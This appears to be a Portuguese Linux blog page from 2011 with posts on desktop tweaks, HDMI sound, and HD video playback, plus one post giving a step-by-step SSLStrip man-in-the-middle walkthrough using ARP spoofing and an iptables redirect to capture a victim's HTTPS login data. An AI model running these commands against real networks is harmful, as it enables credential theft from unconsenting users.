Páginas

terça-feira, 12 de julho de 2011

Deixando o gnome-terminal transparente

Neste artigo mostrarei como se faz para deixar o gnome-terminal transparente. Para isso vamos utilizar o gconf, que é um editor de configurações do Gnome.

Primeiro é necessário baixar o gconf:
$ aptitude install gconf

e se você ainda não possui o gnome-terminal:
$ aptitude install gnome-terminal

Agora abra o gnome-terminal, que se encontra em Aplicativos > Terminal ou pressione Alt + F2 e digite gnome-terminal.




e vá no menu Editar > Preferências do perfil. Vá na aba Plano de Fundo e marque a opção de Fundo transparente.



Agora falta apenas alterar um parâmetro do gconf-editor.

Para os one-linners de plantão, digite o seguinte comando no terminal:
# gconftool-2 --type bool ---set /apps/metacity/general/compositing_manager true

Para quem prefere o ambiente gráfico, basta seguir os seguintes passos.
1 - Abra o gconf-editor. Para isso vá em Aplicativos > Sistema > Editor de configurações ou pressione Alt + F2 e digite gconf-editor.



2 - Estando dentro do Editor, vá em apps > metacity > general e marque a caixa referente a compositing_manager.



Segue um screenshot de como fica o gnome-terminal:



Qualquer dúvida deixe um comentário.

quarta-feira, 6 de julho de 2011

Saída HDMI do meu Ubuntu não sai som! O que fazer?

Bem simples resolver, principalmente para quem é usuário Ubuntu.
Não vou nem falar muito. Basta seguir os 2 passos e zazzz....

1 - Vá em preferências de som..., clicando no ícone do som(mostrado na figura) ou presente na configuração do sistema :

2- Selecione a aba Hardware e modifique o Perfil, como mostrado:


Pronto, pode ligar a saída HDMI de seu pc na sua televisão, ligar o dolby surround, colocar o grave no máximo e aproveitar.

Lembrando que é simples assim por ser ubuntu. Já em Debian, deve-se inserir um arquivo no /etc/ e comentar uma linha para que o som saia pela saída HDMI. Mas isso já é matéria para outro post.

Abraço

Vídeos HD +720p: imagens ficam travando no Ubuntu. Como resolver?

Cada vez mais pesados, os filmes HD estão invadindo os HDs Externos de todos.
Para quem usa linux, geralmente se depara com um problema:
Os vídeos HD com mais de 720p ficam com a imagem travando. Como resolver.

Para quem usa Ubuntu, basta instalar os seguintes aplicativos, utilizando os seguites comandos:

$ sudo apt-get install smplayer
$ sudo apt-get install totem-xine totem-plugins totem-plugins-extra

Pronto. Usuários Ubuntu podem ver filmes agora, sem nenhum travamento da imagem.

terça-feira, 10 de maio de 2011

SSLStrip - Capturando Dados de Conexões SSL

Um breve resumo
O danado Moxie Marlinspike, em um dia de muita luz em sua cabeça, criou um script para interceptar dados seguros transportados em sites web. Toda a interceptação funciona basicamente assim: o sslstrip realiza um "Man in the Middle", substituindo as requisições "https" do cliente por "http". Quando o cliente entra com os dados, o script loga usando https e o cliente nem se dá conta do que está ocorrendo.

Penetrando adentro
A primeira coisa a se fazer é ativar o ip_forward de sua máquina para que os pacotes sejam roteados.

# echo "1" > /proc/sys/net/ipv4/ip_forward

Agora vamos as ferramentas necessárias:
  • python >=2.5 (apt-get install python)
  • python-twisted-web (apt-get install python-twisted-web)
  • arpspoof (apt-get install dsniff)
  • sslstrip (wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz)

Extraia o sslstrip em um local de sua preferência:

# tar -xzvf sslstrip-0.8.tar.gz -C /opt/

Agora precisamos redirecionar o fluxo da porta 80 para outra porta onde o sslstrip irá escuta-lo:

# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

A porta de escuta pode ser qualquer uma que não esteja sendo usada.
Agora vamos a cereja do bolo:

# arpspoof -i eth0 -t Vitima Gateway

-i eth0: interface de rede que está a vítima e o gateway
-t Vitima: o endereço ip da vítima
Gateway: endereço ip do servidor de internet local (roteador, gateway e afins)


Neste momento, executamos o script em python:

# python /opt/sslstrip.py -w /tmp/sslstrip.log -l 10000

Agora é só aguardar que a vítima solicite uma conexão https. Para verificar em tempo real, use o comando tail no log:

$ tail -f /tmp/sslstrip.log

No youtube tem vários videos que demonstram o ataque. Selecionei um para facilitar: http://youtu.be/TJHcfs4inhs

O mais importante: como se proteger deste tipo de ataque?
Existe uma ferramenta (que eu não testei ainda) que promete diversos tipos de proteção. Segue o link abaixo:
http://sourceforge.net/projects/arpon/

Espero que tenha enriquecido a galera com mais conhecimento!
Abraços


Fontes:
segurancalinux.com
Thoughtcrime
ArpON

sexta-feira, 15 de abril de 2011

Executar aplicativos gráficos como root no KDE

O ambiente gráfico KDE tem uma frescura que o root não pode executar aplicativos gráficos por linha de comando.
Para resolver isso, basta copiar uma pasta oculta do usuario comum chamada .Xauthority (sim, ela é oculta), que está no home, para o home do root.

então proceda da seguinte forma:

cp /home/michel/.Xauthority /root/


problema resolvido!